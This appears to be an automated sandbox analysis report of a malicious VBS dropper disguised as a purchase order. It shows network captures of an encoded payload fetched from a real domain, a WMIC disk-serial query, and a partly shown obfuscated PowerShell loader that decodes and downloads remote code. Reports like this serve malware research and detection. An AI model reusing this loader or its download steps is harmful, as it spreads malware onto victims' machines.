                                                                Data Ascii: NKjMxNMsepiTs2mJIoALXdnw+0ygIPtMoCD7TKxTL8P2yENCNIPXTd9XlVlPuorKLTE1EYgwuQNi/s+Zq6KfYKkzqoEUX/mfCaiNWbnoZVywOSMBl5LSz/oQb2RrJVJLoKS3oJuLGH0GmVb+98ELXbkdC5VpCfvKNi64wJWzN5koM7kJ+VqsHFBJBXygIPtMoCD7TKAg9hmZveMBL9RsbYveagZ41d61A2yoK+NxXs1i5c0Cu8MTNLBivb6JCle
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 6f 43 68 6e 4f 64 69 62 4a 6f 79 77 49 50 30 73 58 46 4f 4c 54 4b 41 67 2b 30 79 67 49 50 74 4d 6f 43 78 32 71 75 34 4a 54 78 34 51 74 35 67 70 76 6f 4b 5a 74 47 69 39 59 32 6c 73 2f 43 46 35 41 49 47 33 33 5a 39 31 62 75 51 37 39 73 74 73 6f 43 58 67 32 48 54 45 58 2b 53 2f 50 70 69 66 52 31 6a 6b 55 43 69 69 4d 43 53 2f 4e 4f 6e 38 47 71 6a 6c 31 74 6f 56 79 58 51 7a 50 50 59 6d 65 31 72 41 6d 39 62 63 4c 78 4b 65 6b 6d 53 56 36 35 39 56 38 77 32 69 6b 43 6b 34 76 51 75 38 73 54 32 4c 54 4b 41 67 2b 30 79 67 49 50 74 4d 6f 43 77 53 7a 52 68 45 4f 70 71 78 44 42 4d 77 67 35 79 61 46 34 41 39 56 2b 48 67 43 57 34 4e 37 47 54 2b 53 49 4a 6c 69 37 79 7a 4c 48 74 4d 6f 43 44 37 54 4b 41 67 2b 30 79 67 4c 41 65 73 6c 47 68 59 52 4d 47 31 70 71 6c 77 58 54 72
                                                                Data Ascii: oChnOdibJoywIP0sXFOLTKAg+0ygIPtMoCx2qu4JTx4Qt5gpvoKZtGi9Y2ls/CF5AIG33Z91buQ79stsoCXg2HTEX+S/PpifR1jkUCiiMCS/NOn8Gqjl1toVyXQzPPYme1rAm9bcLxKekmSV659V8w2ikCk4vQu8sT2LTKAg+0ygIPtMoCwSzRhEOpqxDBMwg5yaF4A9V+HgCW4N7GT+SIJli7yzLHtMoCD7TKAg+0ygLAeslGhYRMG1pqlwXTr
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 73 44 44 37 53 59 75 41 6e 31 57 67 71 4f 64 71 6d 51 5a 70 6c 4c 38 4b 34 67 57 47 57 4f 64 6a 43 32 4f 55 46 4c 38 4d 31 4a 61 30 56 59 4b 45 50 6c 42 71 4e 58 68 2f 2f 41 33 31 55 6b 78 68 74 79 63 73 41 68 59 59 4e 6f 70 6c 6a 78 52 33 5a 4b 4e 57 74 58 51 5a 44 30 36 63 65 4c 55 4a 57 44 38 66 30 6d 56 31 76 75 63 4c 61 72 4e 76 71 44 2f 64 63 71 56 79 36 37 79 2f 54 63 74 4d 6f 43 44 37 54 4b 41 67 2b 30 79 67 4c 42 68 55 39 4c 71 39 50 64 46 44 62 53 54 6c 75 37 6f 49 7a 70 41 61 42 74 63 44 53 6c 69 44 68 48 77 66 61 62 6a 6e 5a 68 51 66 36 65 53 2b 69 4e 50 41 49 2b 77 77 34 61 75 31 42 59 70 52 45 77 61 2f 2b 62 30 67 5a 6d 7a 61 77 45 78 75 51 79 50 6d 4f 45 38 35 2b 2b 37 64 30 55 4c 6c 6e 2b 66 70 6c 44 30 35 6d 65 71 4e 34 6d 38 35 65 2b 74
                                                                Data Ascii: sDD7SYuAn1WgqOdqmQZplL8K4gWGWOdjC2OUFL8M1Ja0VYKEPlBqNXh//A31UkxhtycsAhYYNopljxR3ZKNWtXQZD06ceLUJWD8f0mV1vucLarNvqD/dcqVy67y/TctMoCD7TKAg+0ygLBhU9Lq9PdFDbSTlu7oIzpAaBtcDSliDhHwfabjnZhQf6eS+iNPAI+ww4au1BYpREwa/+b0gZmzawExuQyPmOE85++7d0ULln+fplD05meqN4m85e+t
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 31 77 49 6c 47 66 2b 2f 2b 50 6f 56 61 6e 4c 55 57 48 39 37 54 4b 41 73 4e 4d 30 56 75 67 35 34 4f 72 53 33 30 52 39 4c 48 51 65 76 74 38 49 7a 67 53 57 41 68 77 47 77 41 53 63 71 66 77 41 54 49 43 44 37 51 47 4c 31 79 39 64 34 36 55 2b 67 4d 69 74 46 71 53 67 6d 78 4e 59 6e 30 45 6c 71 43 2b 79 6c 4d 58 2f 79 46 67 4e 62 65 62 74 4d 6f 43 58 51 37 67 76 39 66 75 53 2b 68 32 58 55 4a 46 6a 6b 5a 34 58 76 54 74 53 2b 67 4d 4f 6e 35 49 57 43 68 44 35 51 61 6a 56 32 53 4b 51 37 45 42 65 47 5a 65 68 43 52 33 35 42 4b 75 78 45 70 7a 42 55 64 51 6d 45 32 39 68 44 63 33 51 4a 55 36 33 4f 34 69 69 70 61 33 79 67 33 49 68 5a 59 43 44 37 54 4b 41 67 2b 30 79 67 49 50 74 44 58 34 31 4a 58 58 71 52 58 4b 37 33 55 65 65 49 36 50 6e 5a 47 47 47 4f 70 39 33 56 69 37 39
                                                                Data Ascii: 1wIlGf+/+PoVanLUWH97TKAsNM0Vug54OrS30R9LHQevt8IzgSWAhwGwAScqfwATICD7QGL1y9d46U+gMitFqSgmxNYn0ElqC+ylMX/yFgNbebtMoCXQ7gv9fuS+h2XUJFjkZ4XvTtS+gMOn5IWChD5QajV2SKQ7EBeGZehCR35BKuxEpzBUdQmE29hDc3QJU63O4iipa3yg3IhZYCD7TKAg+0ygIPtDX41JXXqRXK73UeeI6PnZGGGOp93Vi79
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 78 65 4c 4d 74 4c 36 62 66 70 44 63 65 4f 58 35 47 56 6c 5a 49 38 77 64 49 31 4f 61 5a 43 69 77 38 36 31 65 64 42 6e 38 36 31 79 67 4b 4c 55 43 4a 59 6d 62 66 4b 71 78 52 68 37 78 6d 41 4d 65 55 41 44 37 52 42 68 79 43 32 79 67 4c 4e 73 4d 71 48 33 6a 31 58 52 67 32 30 79 6d 51 32 66 33 46 6c 36 57 5a 72 67 2f 78 75 71 53 69 45 30 76 50 42 6a 6b 65 41 70 39 77 36 6d 62 6b 46 31 48 51 48 6a 45 2f 52 44 59 75 74 64 41 45 50 37 30 76 78 2b 4b 54 68 70 6c 79 4d 4e 34 6d 53 38 4d 67 43 44 34 77 49 36 68 49 58 79 51 4b 47 49 58 6b 44 44 37 52 4c 66 33 2b 52 76 67 49 50 75 30 63 30 73 4c 66 4b 69 38 33 6d 51 5a 65 38 74 63 6f 43 69 30 6f 39 77 4a 59 41 39 55 48 6e 70 4d 6f 43 44 39 37 4c 36 74 34 68 79 51 4a 58 30 6a 33 42 2b 6a 38 49 42 67 38 2f 6e 69 59 4c 63
                                                                Data Ascii: xeLMtL6bfpDceOX5GVlZI8wdI1OaZCiw861edBn861ygKLUCJYmbfKqxRh7xmAMeUAD7RBhyC2ygLNsMqH3j1XRg20ymQ2f3Fl6WZrg/xuqSiE0vPBjkeAp9w6mbkF1HQHjE/RDYutdAEP70vx+KThplyMN4mS8MgCD4wI6hIXyQKGIXkDD7RLf3+RvgIPu0c0sLfKi83mQZe8tcoCi0o9wJYA9UHnpMoCD97L6t4hyQJX0j3B+j8IBg8/niYLc


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549401200.6.118.1624436764C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 03:02:41 UTC196OUTGET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: torresvmackenna.cl
                                                                Cache-Control: no-cache
                                                                2024-10-31 03:02:42 UTC462INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 03:02:42 GMT
                                                                Server: Apache
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                X-Frame-Options: sameorigin
                                                                Last-Modified: Wed, 30 Oct 2024 22:01:08 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 494656
                                                                Referrer-Policy: no-referrer
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close
                                                                Content-Type: application/octet-stream
                                                                2024-10-31 03:02:42 UTC7730INData Raw: d5 23 d0 3e a3 d6 dc 91 9b d8 30 33 6c 95 e1 00 2c 4d df dc 5b dc cb ad 3b 5a 84 92 f4 1c 03 db 30 45 a1 68 5d a8 7d 5d 7c 05 a4 d5 d9 f1 e4 7c 41 21 3f dd ef f4 28 e0 c3 60 c6 83 fc 07 f4 c7 1c ba 83 66 76 77 12 ad f7 7d eb 1b bd 5c de 44 3c 32 9b 0c b2 3b b3 bf 4a 9f 13 29 03 3a be cc d4 1d 23 21 70 3b 3e 22 88 61 4a 92 ed 9d 1f eb bb 7d 0b f2 d2 a8 d8 76 24 c7 47 c2 6d a7 c6 e3 1b 98 6f 46 94 e7 d3 c9 10 22 2f 31 4b f5 f7 23 b2 be 72 ef 3f 19 4d ce 70 77 5a 6e 0c d9 06 86 1c 6d 41 c9 a2 5b 70 6c ec 92 2c 50 26 f5 75 1a 08 e0 18 3c 8d b0 c9 b9 c4 8c 22 a2 8a 0f 47 da 3b 62 34 c3 07 7f bf 4b d1 eb dc 4d d4 6e cd d3 ed 58 63 76 d0 d6 ae 0f a2 e1 80 27 dc d8 5f f0 77 b6 c8 c2 13 3e 4c 16 2d 81 13 d9 b6 95 31 ad 99 53 00 14 ff 9d f0 79 d5 32 f4 90 fa f2 63
                                                                Data Ascii: #>03l,M[;Z0Eh]}]||A!?(`fvw}\D<2;J):#!p;>"aJ}v$GmoF"/1K#r?MpwZnmA[pl,P&u<"G;b4KMnXcv'_w>L-1Sy2c
                                                                2024-10-31 03:02:42 UTC8000INData Raw: e4 f2 39 e6 b8 16 23 f7 53 bc e3 64 9c be c0 71 d4 7e 69 60 51 c0 a1 ab 55 9d d6 3e 02 a1 5a b8 96 a2 9f 0a c5 d8 97 7e e0 99 7e 83 aa 3e 6d 70 89 4a 10 91 da 6f 56 f2 74 b7 2f 0d 53 7a cd 75 3a 86 8c 84 90 a7 f0 5b 15 fa dd 5c 56 8b 08 c1 d8 cf 31 d2 5a 9f 5d 72 0e 4e 92 c0 5a c7 33 83 f9 23 42 32 ad 2e b1 ca ea 53 f3 85 eb 75 83 31 27 43 3b 5d e6 be ef 7b df 4e 3d 7a e6 af a1 ee 85 23 4c 81 0d c8 9e dc b1 b5 05 6b 7f af bd 24 71 c0 07 3f af 88 a0 2f 81 3c eb b9 77 32 a0 d5 a5 96 fb 78 1e 21 cf 46 73 2e 7d 03 7f 20 4a 0a 6c 1d 54 12 fa 63 7c fd 4c 75 f2 64 d2 c2 9a e5 a1 0f 9a e8 4b 2b 15 6d 8e db c1 87 ab f0 2c ef c4 b3 2f d9 79 0b 34 2a 4c 24 f0 3e 37 6f a1 87 bf fd 01 78 31 bb 40 2f 62 f7 45 bc 50 3b 5f b6 df 5a 1d ca 3a d4 dc a7 34 41 f3 37 61 ab fd
                                                                Data Ascii: 9#Sdq~i`QU>Z~~>mpJoVt/Szu:[\V1Z]rNZ3#B2.Su1'C;]{N=z#Lk$q?/<w2x!Fs.} JlTc|LudK+m,/y4*L$>7ox1@/bEP;_Z:4A7a
                                                                2024-10-31 03:02:42 UTC8000INData Raw: 9b 61 b6 f2 ab bf 83 5e 25 75 d0 20 d4 ab fe 68 9e 00 e8 5e 62 f6 16 7c 4c 38 fb f7 82 ef 18 65 f0 34 44 10 1e 9b 6e bb f1 2c 03 e9 f0 60 2e 50 11 4f 09 be b6 17 de 90 e8 38 5e 80 e4 b1 d4 de f1 fb 86 9c 49 45 18 f1 b4 59 a1 cf dc 88 c3 28 ae 73 d5 99 18 40 c2 38 33 1e 8f ac e1 1a 55 9c 7d 6f e0 55 b2 47 75 b4 49 57 6d 8f 19 ae 7e 26 66 d2 88 32 66 e3 70 72 99 29 b2 14 76 fd e4 e1 bf ad 77 97 05 db d9 97 f2 32 c9 22 3d 67 f4 bf b0 16 f3 e2 7b 56 6d 40 e6 8d 97 66 9c 57 a8 57 b7 14 29 7e 34 7d 58 32 b7 b1 ca 47 71 f9 09 66 3e 13 e6 37 21 ee c7 a7 c8 89 57 4c 34 3e b9 a7 9f af 9b ad 1e fe ef f4 d8 bb 5a d2 be d4 ca 9a b7 0a ec 26 13 bf 17 f7 f3 d2 fb 3a 13 96 df 80 e3 ec 0f ee 6f 42 49 eb 38 45 d7 bb 49 b0 58 24 e6 37 e8 09 3b fa 31 a2 bb 11 47 47 da 7f 35
                                                                Data Ascii: a^%u h^b|L8e4Dn,`.PO8^IEY(s@83U}oUGuIWm~&f2fpr)vw2"=g{Vm@fWW)~4}X2Gqf>7!WL4>Z&:oBI8EIX$7;1GG5
                                                                2024-10-31 03:02:42 UTC8000INData Raw: 86 5a 0f 47 da df 45 3b 11 b0 e8 e5 11 71 f1 0a 33 74 24 ac 52 ee 53 c8 2c 8b cd 78 71 b6 23 12 a6 cc 9d d7 05 48 6d b7 3d 81 78 98 68 6c 20 14 2c 13 0e 0b 4f 4f e9 11 39 e3 d0 ad fe bb ac 4b ee 25 65 dd 36 af bb 66 a5 a0 f0 ff 9a 6f 0c f4 c1 3d 9f 08 35 d4 00 cf ce a4 f7 e2 23 cb 39 b8 94 f6 a5 79 bd d9 e0 5e 08 22 29 23 a2 3b ab e5 28 70 f9 0d d6 52 8f 45 cb 41 69 79 60 54 e5 a4 13 00 19 b8 fa 1d f5 c6 32 fb 90 cc 6f 82 ae f1 e7 0a ad e2 6c 68 a2 19 d9 0f 9d 04 fa f9 72 21 f0 82 7a 41 44 9a a5 a5 d5 97 cf 7b 4b df aa 3c de 1f 23 d2 65 06 5b c9 c4 89 66 97 d5 31 87 9f 8f 2e 18 62 59 88 9f 74 35 6e da 04 98 0a 4e d7 1d 91 75 31 40 a3 88 45 d8 c1 08 5d dd 91 39 37 38 4e 78 e2 4b 69 66 f5 dd 6e 61 fa bd 49 9f df 55 4f 07 12 ae c5 73 be c2 55 7b 5e cc 0d 94
                                                                Data Ascii: ZGE;q3t$RS,xq#Hm=xhl ,OO9K%e6fo=5#9y^")#;(pREAiy`T2olhr!zAD{K<#e[f1.bYt5nNu1@E]978NxKifnaIUOsU{^
                                                                2024-10-31 03:02:42 UTC8000INData Raw: b3 1e 81 90 50 9a 55 c9 f3 97 d7 33 90 f9 1e cf b1 3b 46 b6 14 d8 4e b8 c3 da cb 49 38 96 74 07 dd 4e 87 0b 35 83 71 e2 42 2e b1 32 c6 92 81 22 3a 4b 58 40 9f 2d fd da 8e 62 6f 77 85 dc e6 e0 04 fc 65 7a 2c 79 9a 01 6d 14 71 80 2f a7 aa 61 45 55 f4 4c 1e f9 eb 19 ee 55 ed 7a 33 24 84 39 a8 0d 60 1e cb ef a9 ac c9 aa 94 25 8f 10 c0 5c 00 1a 08 3e 39 a3 40 1a 80 96 70 1d f6 5a 59 20 13 23 5d 6e 81 53 05 72 57 3a 94 5d e7 c2 84 f6 d5 41 45 5f 3a 36 a2 26 09 d4 02 5b 5a 65 b0 6d 8a b7 79 c4 7a 37 7a fa e1 91 96 0e 90 ab 12 dd a8 8b 51 f9 4f 21 2b 16 18 02 df ac 12 f3 41 91 47 fd 5e b8 2e 90 0c 07 d8 b1 ff 63 84 84 b0 78 88 78 4e 75 11 72 b7 cc 38 d3 a4 12 2a 80 35 56 17 82 6e d0 34 f5 83 c3 8c 6e 74 a9 e1 6a 73 49 f0 da ac d2 d1 20 a2 88 27 e7 1b 2c 58 b4 f1
                                                                Data Ascii: PU3;FNI8tN5qB.2":KX@-bowez,ymq/aEULUz3$9`%\>9@pZY #]nSrW:]AE_:6&[Zemyz7zQO!+AG^.cxxNur8*5Vn4ntjsI ',X
                                                                2024-10-31 03:02:42 UTC8000INData Raw: 5f 74 15 b7 0e 8a f1 56 db 49 45 3a cd ff dd 19 67 97 97 60 53 1c 09 fe 02 18 9b 73 75 c2 c5 1a 6b 29 67 73 d2 38 77 e0 c1 f0 42 c9 22 a0 2b 61 f2 30 a4 3d 43 70 59 31 04 aa f0 58 ff a2 f1 58 4a 5f d3 11 c8 bd 14 f8 94 c2 1c 9e d8 09 c6 67 20 c4 b9 dc 61 45 df 53 88 f8 b1 c0 22 d1 a7 10 a4 51 14 d1 ef fd c2 5f 84 f7 bc da aa a5 e8 d6 fd f6 f1 b7 ff 76 05 04 61 1f 63 a1 b4 e9 8e 21 5f c1 39 48 b0 26 48 98 d3 06 3c 4b 06 a7 64 f6 5a aa fd d6 e7 cf 8c 03 46 43 c4 a2 07 eb c4 6e 07 6b 5d 67 ff c6 2a 06 32 7a 56 20 f6 a4 66 0d ec 23 ec 99 f1 b7 67 be 99 7d 52 9b 13 e4 de ac ca 45 64 f3 e2 c4 a6 cf 98 da 13 a4 78 52 35 03 3c 20 54 de 8f 6b c1 37 1c f3 0f 92 45 9f 6b f8 d3 fd 0b f2 d2 23 17 9e 02 b0 b8 3d 25 59 d3 73 87 c2 d5 22 86 ea 2e 54 76 9a c6 09 f0 2b 5c
                                                                Data Ascii: _tVIE:g`Ssuk)gs8wB"+a0=CpY1XXJ_g aES"Q_vac!_9H&H<KdZFCnk]g*2zV f#g}REdxR5< Tk7Ek#=%Ys".Tv+\
                                                                2024-10-31 03:02:42 UTC8000INData Raw: e5 85 2e 58 9e f5 30 36 f0 e3 d3 5a d3 fd 4f a4 42 87 b2 03 31 a4 ef 74 cb fa 5a 6e ae e9 9f c2 f0 4b f9 f0 a7 bc b4 54 64 94 d3 24 30 63 d3 13 3b 41 d3 c7 63 4d 9d 2d 32 2a 26 0f f9 0c 7b 8b 33 b5 9b 7c bc 73 57 09 07 44 b0 30 78 4b 09 e0 96 df 33 3b 95 19 04 e9 59 ea 34 f8 fa 2a 9e bc c2 f6 a2 4e a9 f5 d3 04 80 60 af bf 9b 7d f0 c8 0d 90 ef b0 32 0c d3 3c ea f9 3b 22 25 ba b0 52 88 af b3 45 22 bb 9b 7a d8 4e 18 57 fd 27 22 a6 eb d7 8a ac f2 7f 20 3d fa fd ef 0b f4 8f e9 d4 be 49 9f b0 fc ab 55 20 1b 76 40 32 5d 81 e9 01 49 65 b2 b3 51 44 a7 3d 98 16 57 ad 44 1c 5a bd 81 42 0c 24 d7 54 aa 0d b3 cf 35 c7 97 a3 dc bb c4 24 46 11 94 91 1e cb db f7 a1 6a c0 82 e1 d4 c9 ec f3 e8 6b f8 df d2 68 bb b2 85 ba 70 cd 80 96 e4 d9 6f 8b 4a 8f 98 e0 3b bd 4b 01 a8 f1
                                                                Data Ascii: .X06ZOB1tZnKTd$0c;AcM-2*&{3|sWD0xK3;Y4*N`}2<;"%RE"zNW'" =IU v@2]IeQD=WDZB$T5$FjkhpoJ;K
                                                                2024-10-31 03:02:42 UTC8000INData Raw: 4c 2e 1a db e1 6a 57 15 cf 21 17 7c 0b 6d c8 2f a3 12 51 ae af 43 98 8e 54 f9 03 dc 47 bc 1d 91 4a c4 40 c8 11 65 75 ac 20 38 fc 63 d5 8e 2f 8f 35 04 92 13 e5 02 44 3d 58 5b 5f a4 ec c1 26 6b 2e ed 59 13 02 69 77 e6 c3 4c 62 c1 40 e9 1a 3b d1 e0 b7 bb 74 39 3e 42 39 63 b9 25 53 87 18 03 53 85 b7 52 c2 6c de af 60 2c 3c 30 96 b7 eb e8 c2 35 e1 15 49 df a9 c3 06 c0 32 7b 59 aa 14 a7 8a 21 26 5a 7d 95 a3 a2 8f 8c fa 26 e0 30 45 06 a1 f1 ee 93 ab e3 f6 38 d2 0b 0a c8 24 05 01 48 b7 dd 5d 0d 27 f2 34 02 52 7b 1f c2 88 b7 e9 a2 93 57 a5 c1 b2 af 96 4b ad 70 c5 3b 5d 10 c9 41 07 61 e6 85 69 c2 54 ef 48 0d 7d d0 13 d8 8c 97 6c 34 28 14 db f0 31 a0 28 2d 5b 59 19 f6 c5 78 59 e8 1d 38 1d 17 8a 0c 9c 22 ea f3 3b 1f 9e c4 87 6e 60 be 8c 0f c1 4b ae b2 6f 31 9a fa ea
                                                                Data Ascii: L.jW!|m/QCTGJ@eu 8c/5D=X[_&k.YiwLb@;t9>B9c%SSRl`,<05I2{Y!&Z}&0E8$H]'4R{WKp;]AaiTH}l4(1(-[YxY8";n`Ko1
                                                                2024-10-31 03:02:42 UTC8000INData Raw: 83 1c 70 79 00 69 f8 30 61 83 f5 0c 75 21 2b ac 3c 6b 96 8d 21 42 c2 fe e2 c3 b7 1a 14 50 03 ac 9a 88 13 a2 87 75 ea 04 51 9c a3 33 15 ea ea a0 2d 18 f1 59 38 ae 4d a2 48 a1 89 cc 90 62 f1 f3 29 af 9b 82 5b 7e 4c c6 96 cb 91 ae 88 c8 99 e8 3a b6 bb 63 b0 06 03 24 37 17 97 7a 5f f7 a5 6e 4c fd 49 4d 09 18 4c ba 92 5a 4f 53 22 05 b6 ec f5 4b 14 7c 50 71 ce 53 0a 09 72 61 6a 22 da a5 69 a2 90 f7 e9 fc 57 7b 5c ea 34 64 1e 3c 16 54 43 6f d9 c2 f8 1f f3 04 3b 1c 2f 2a da 25 81 35 c6 0f 0e ca 55 52 e1 fa c2 4e ce 95 23 de 52 5f d4 70 2b 70 d0 cc 79 fd 90 5a 44 c0 4b 7a e0 10 1b 16 69 f7 52 00 3d f9 90 8e e3 86 75 3e 86 51 17 c0 9b 73 94 c0 06 7e 49 2a 98 fb e6 a9 91 ed 97 ce b5 8a 06 30 4c 10 ba 88 cc 64 16 c9 7b da 87 61 d8 c3 ca 1a 54 6e a1 fb fe e0 ce 4e 67
                                                                Data Ascii: pyi0au!+<k!BPuQ3-Y8MHb)[~L:c$7z_nLIMLZOS"K|PqSraj"iW{\4d<TCo;/*%5URN#R_p+pyZDKziR=u>Qs~I*0Ld{aTnNg
                                                                2024-10-31 03:02:42 UTC8000INData Raw: 4f 13 eb 4b 5f fc 92 68 d7 53 97 79 2a a0 19 ce 8d 92 be 0c a3 05 e8 fd 38 a5 6c 63 59 1a 2d 49 ba 19 19 76 1f 9d d6 bc cf e8 cf 3c 87 5d 0f 2d df 8c 1b 3f ea 4c 0b 3c e7 cc 52 27 5a ed 4f 86 68 be 3a 2d ab e0 df e1 9c 93 01 dc 41 bd 02 b9 8c 3d 70 eb 4d 7d 8e 5d 74 88 d0 2f 13 f0 fc c6 4b a6 e7 36 13 e1 78 b2 e8 ff d8 b0 71 97 59 d2 2d 18 bd ec aa 96 c7 20 a6 52 9e 1c ef 30 ac 01 e4 bf da 2a 38 9b a1 48 bd 66 d1 49 4a 72 8d c6 79 67 c7 3b fe 76 89 a9 5f d5 20 0e 89 36 52 9c 83 72 b1 96 7d 1a 44 16 f2 65 9d 9b 09 d5 ce a5 3f da c4 5c 6c 73 18 3c 92 f3 1c 3d a3 54 d6 ea 4a 68 bd e2 7e cd ef f2 29 85 f1 44 66 d9 2c 05 ac 95 e2 b6 e3 f9 65 f0 a5 5e dc 54 7b b8 76 6c 0b 5d cb 08 b4 ae 54 34 ac 1e 8c 19 0f 4c 5f dd f1 f9 8b b9 57 57 e0 a4 70 0f a1 f8 52 57 b9
                                                                Data Ascii: OK_hSy*8lcY-Iv<]-?L<R'ZOh:-A=pM}]t/K6xqY- R0*8HfIJryg;v_ 6Rr}De?\ls<=TJh~)Df,e^T{vl]T4L_WWpRW


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:23:01:54
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
                                                                Imagebase:0x7ff76def0000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:23:01:56
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wmic diskdrive get caption,serialnumber
                                                                Imagebase:0x7ff78b330000
                                                                File size:576'000 bytes
                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:23:01:56
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:23:01:57
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S 